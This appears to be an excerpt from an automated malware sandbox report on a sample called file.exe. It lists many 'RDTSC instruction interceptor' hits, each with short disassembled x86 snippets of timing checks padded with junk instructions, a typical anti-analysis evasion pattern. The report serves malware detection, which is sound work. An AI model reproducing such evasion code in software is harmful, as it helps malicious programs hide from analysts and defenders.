              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D34570 second address: D345A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F11A12050B6h 0x0000000a jmp 00007F11A12050C0h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F11A12050C7h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D345A8 second address: D345CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F11A1057FB3h 0x00000009 jmp 00007F11A1057FB0h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D34753 second address: D34757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D34757 second address: D34765 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F11A1057FA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D34765 second address: D34769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D34769 second address: D3478C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A1057FB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3478C second address: D3479F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F11A12050BEh 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB95F6 second address: CB9611 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F11A1057FAFh 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3F026 second address: D3F02A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3F02A second address: D3F032 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3F032 second address: D3F03F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3F03F second address: D3F044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3F044 second address: D3F049 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3D949 second address: D3D965 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jmp 00007F11A1057FB1h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3D965 second address: D3D97D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F11A12050BEh 0x0000000a popad 0x0000000b push ecx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3D97D second address: D3D983 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3DAF5 second address: D3DAFA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3DAFA second address: D3DB09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 jl 00007F11A1057FBBh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3DB09 second address: D3DB3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11A12050BFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F11A12050E8h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F11A12050C0h 0x00000018 jnc 00007F11A12050B6h 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3DB3C second address: D3DB42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3DCAB second address: D3DCB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F11A12050B6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3DCB5 second address: D3DCD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F11A1057FB2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3DCD0 second address: D3DCE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3DCE1 second address: D3DCE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3DCE5 second address: D3DCF9 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F11A12050B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jl 00007F11A12050B6h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3DCF9 second address: D3DCFF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3DE54 second address: D3DE67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 jno 00007F11A12050B6h 0x0000000c pop eax 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3DE67 second address: D3DE6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3DE6D second address: D3DE83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F11A12050BFh 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3DE83 second address: D3DE89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3DE89 second address: D3DEAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A12050C9h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3E00E second address: D3E023 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A1057FAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3E023 second address: D3E029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3E30A second address: D3E30E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3E30E second address: D3E316 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3E316 second address: D3E31B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3E611 second address: D3E615 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3E615 second address: D3E619 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3EA2D second address: D3EA44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A12050C3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3EA44 second address: D3EA66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007F11A1057FACh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F11A1057FABh 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3EA66 second address: D3EA6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3EA6E second address: D3EA82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F11A1057FAEh 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3EE63 second address: D3EE69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3EE69 second address: D3EE84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11A1057FB6h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3EE84 second address: D3EE8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3EE8A second address: D3EE90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3EE90 second address: D3EE94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3EE94 second address: D3EEBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F11A1057FB1h 0x0000000c jp 00007F11A1057FA6h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push edi 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d pop eax 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3D62C second address: D3D66B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F11A12050C1h 0x0000000b jmp 00007F11A12050C4h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jns 00007F11A12050B6h 0x00000019 jmp 00007F11A12050BBh 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D44FC9 second address: D44FCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D43CFB second address: D43D01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D43E9A second address: D43EB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11A1057FB4h 0x00000009 ja 00007F11A1057FA6h 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D43EB9 second address: D43EC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 pop edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4395C second address: D43971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F11A1057FA6h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F11A1057FA6h 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D43971 second address: D43975 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D43975 second address: D43993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F11A1057FB2h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D43993 second address: D43997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D43997 second address: D439DD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F11A1057FB2h 0x0000000d push edx 0x0000000e jmp 00007F11A1057FB0h 0x00000013 jmp 00007F11A1057FB6h 0x00000018 pop edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D44846 second address: D44852 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D44852 second address: D44856 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D44856 second address: D44877 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F11A12050C9h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47418 second address: D4741E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4741E second address: D4742B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4742B second address: D4742F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4742F second address: D47435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4712C second address: D47132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D49D5D second address: D49D61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4A12D second address: D4A146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F11A1057FB2h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4E820 second address: D4E83C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A12050C8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4E83C second address: D4E842 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4E977 second address: D4E97B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4E97B second address: D4E986 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4E986 second address: D4E98C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4EBF9 second address: D4EC0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c je 00007F11A1057FA6h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4EC0B second address: D4EC33 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F11A12050B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F11A12050C9h 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4EC33 second address: D4EC42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jo 00007F11A1057FACh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4EC42 second address: D4EC5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F11A12050C1h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4EC5D second address: D4EC63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4EC63 second address: D4EC67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4EC67 second address: D4EC6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4EC6B second address: D4EC7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F11A12050B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4EC7B second address: D4EC7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4EDCD second address: D4EDD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4EEEE second address: D4EEFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F11A1057FA6h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4EEFF second address: D4EF03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4EF03 second address: D4EF07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4EF07 second address: D4EF15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4EF15 second address: D4EF1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4EF1B second address: D4EF2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F11A12050BAh 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D53990 second address: D5399B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F11A1057FA6h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D53C66 second address: D53C6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D53C6C second address: D53C72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D53C72 second address: D53C89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A12050C1h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFA40E second address: CFA47E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007F11A1057FB3h 0x0000000e mov ebx, dword ptr [ebp+1247D342h] 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007F11A1057FA8h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 00000016h 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e mov di, dx 0x00000031 jmp 00007F11A1057FB9h 0x00000036 add eax, ebx 0x00000038 movzx ecx, cx 0x0000003b nop 0x0000003c push eax 0x0000003d push edx 0x0000003e jnl 00007F11A1057FACh 0x00000044 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5425A second address: D54260 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D59287 second address: D5928B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D602F1 second address: D602F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D602F5 second address: D602FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D602FB second address: D60319 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F11A12050B6h 0x0000000e jmp 00007F11A12050C0h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D60319 second address: D6031D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
